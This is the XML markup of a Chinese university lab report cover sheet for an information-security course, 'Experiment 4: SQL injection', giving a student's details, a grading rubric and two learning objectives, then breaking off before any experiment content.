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392AA" w14:textId="65A446A0" w:rsidR="00125B21" w:rsidRPr="00177366" w:rsidRDefault="00125B21" w:rsidP="00177366">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r w:rsidR="00654CE7">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>信息安全概论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>》实验报告</w:t>
      </w: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192"/>
        <w:gridCol w:w="1837"/>
        <w:gridCol w:w="431"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="767"/>
        <w:gridCol w:w="2956"/>
      </w:tblGrid>
      <w:tr w:rsidR="00125B21" w:rsidRPr="00F778EE" w14:paraId="32F67C35" w14:textId="77777777" w:rsidTr="007F0509">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="590"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B1E593F" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5652CFC1" w14:textId="6E819CC6" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="005D3610" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>李燕琴</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41F90158" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>年级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08B56BD5" w14:textId="3BFC3401" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00FE3AE4" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>019</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>级</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w:rsidRPr="00F778EE" w14:paraId="7D0B8CCE" w14:textId="77777777" w:rsidTr="007F0509">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="590"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3507CF14" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="079FF33B" w14:textId="659E13D7" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00FE3AE4" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>0195633</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E42E46B" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>专业、班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0741A960" w14:textId="74342D9A" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00BA1513" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>计算机科学与技术（卓越）</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>班</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="236AD37A" w14:textId="77777777" w:rsidTr="00A5242F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14:paraId="3F25BF3C" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7117" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26263924" w14:textId="7637C09D" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00BA1513" w:rsidP="00807833">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51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3D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>实验四</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>注入实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="32432F13" w14:textId="77777777" w:rsidTr="00A5242F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14:paraId="543FA80A" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21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Cs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs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291E74BB" w14:textId="5164D5CF" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0010227E" w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>2022</w:t>
            </w:r>
            <w:r w:rsidR="0010227E" w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>年</w:t>
            </w:r>
            <w:r w:rsidR="0010227E" w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0010227E" w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidR="0010227E" w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0010227E" w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="0010227E" w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>日</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1070EF65" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21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Cs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs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 w14:paraId="579CB7C7" w14:textId="6CBA980B" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="0010227E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Cs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>DS</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>3402</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="6BB7DBA3" w14:textId="77777777" w:rsidTr="00A5242F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14:paraId="5671C750" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21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Cs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs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65F838FA" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00125B21">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:leftChars="-20" w:left="-44" w:right="171" w:firstLineChars="100" w:firstLine="220"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EAEC4C1" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00125B21">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:leftChars="-20" w:left="-44" w:right="171"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>实验性质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11BF1C93" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="003D6703" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="171"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>验证性</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>设计性</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="003D6703">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>综合性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="3D1BCD0D" w14:textId="77777777" w:rsidTr="00E73574">
        <w:trPr>
          <w:trHeight w:val="3249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0771EAD0" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00BC287A" w:rsidRDefault="00125B21" w:rsidP="00A5242F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 w:rsidRPr="00BC287A"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14:paraId="3849E4EF" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK6"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK9"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK10"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK20"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK21"/>
            <w:bookmarkStart w:id="8" w:name="OLE_LINK27"/>
            <w:bookmarkStart w:id="9" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="10" w:name="OLE_LINK29"/>
            <w:bookmarkStart w:id="11" w:name="OLE_LINK30"/>
            <w:bookmarkStart w:id="12" w:name="OLE_LINK31"/>
            <w:bookmarkStart w:id="13" w:name="OLE_LINK37"/>
            <w:bookmarkStart w:id="14" w:name="OLE_LINK40"/>
            <w:bookmarkStart w:id="15" w:name="OLE_LINK41"/>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK43"/>
            <w:bookmarkStart w:id="17" w:name="OLE_LINK44"/>
            <w:bookmarkStart w:id="18" w:name="OLE_LINK45"/>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK46"/>
            <w:bookmarkStart w:id="20" w:name="OLE_LINK47"/>
            <w:bookmarkStart w:id="21" w:name="OLE_LINK48"/>
            <w:bookmarkStart w:id="22" w:name="OLE_LINK49"/>
            <w:bookmarkStart w:id="23" w:name="OLE_LINK53"/>
            <w:bookmarkStart w:id="24" w:name="OLE_LINK54"/>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK55"/>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK56"/>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK57"/>
            <w:bookmarkStart w:id="28" w:name="OLE_LINK58"/>
            <w:bookmarkStart w:id="29" w:name="OLE_LINK59"/>
            <w:bookmarkStart w:id="30" w:name="OLE_LINK60"/>
            <w:bookmarkStart w:id="31" w:name="OLE_LINK63"/>
            <w:bookmarkStart w:id="32" w:name="OLE_LINK64"/>
            <w:bookmarkStart w:id="33" w:name="OLE_LINK65"/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算法/实验过程正确；</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">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源程序/实验内容提交</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">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程序结构/实验步骤合理；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E08795" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F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实验结果正确；</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">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语法、语义正确；</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">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报告规范；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11BE220B" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F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楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>评语：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">                           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462CBB57" w14:textId="77777777" w:rsidR="00F6708E" w:rsidRPr="00F6708E" w:rsidRDefault="00125B21" w:rsidP="00F6708E">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51" w:firstLineChars="150" w:firstLine="330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</w:t>
            </w:r>
            <w:r w:rsidR="00E73574">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">                        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>评价教师签名（电子签名）：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>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="6BA9192B" w14:textId="77777777" w:rsidTr="00D61110">
        <w:trPr>
          <w:trHeight w:val="1841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E963A65" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F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一、实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58474147" w14:textId="77777777" w:rsidR="0058539E" w:rsidRPr="0058539E" w:rsidRDefault="0058539E" w:rsidP="00A92EE6">
            <w:pPr>
              <w:pStyle w:val="a7"/>
            </w:pPr>
            <w:r w:rsidRPr="0058539E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="0058539E">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="0058539E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>学习并掌握SQL注入的基本原理和方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBD4913" w14:textId="6B318D6B" w:rsidR="001B0DA1" w:rsidRPr="003B0E62" w:rsidRDefault="0058539E" w:rsidP="00A92EE6">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0058539E">
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="0058539E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>学习SQL注入的防范措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="12B6167C" w14:textId="77777777" w:rsidTr="00C47A2E">
        <w:trPr>
          <w:trHeight w:val="1634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1377A76" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21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二、实验项目内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A509804" w14:textId="77777777" w:rsidR="001858B4" w:rsidRPr="001858B4" w:rsidRDefault="001858B4" w:rsidP="00A92EE6">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
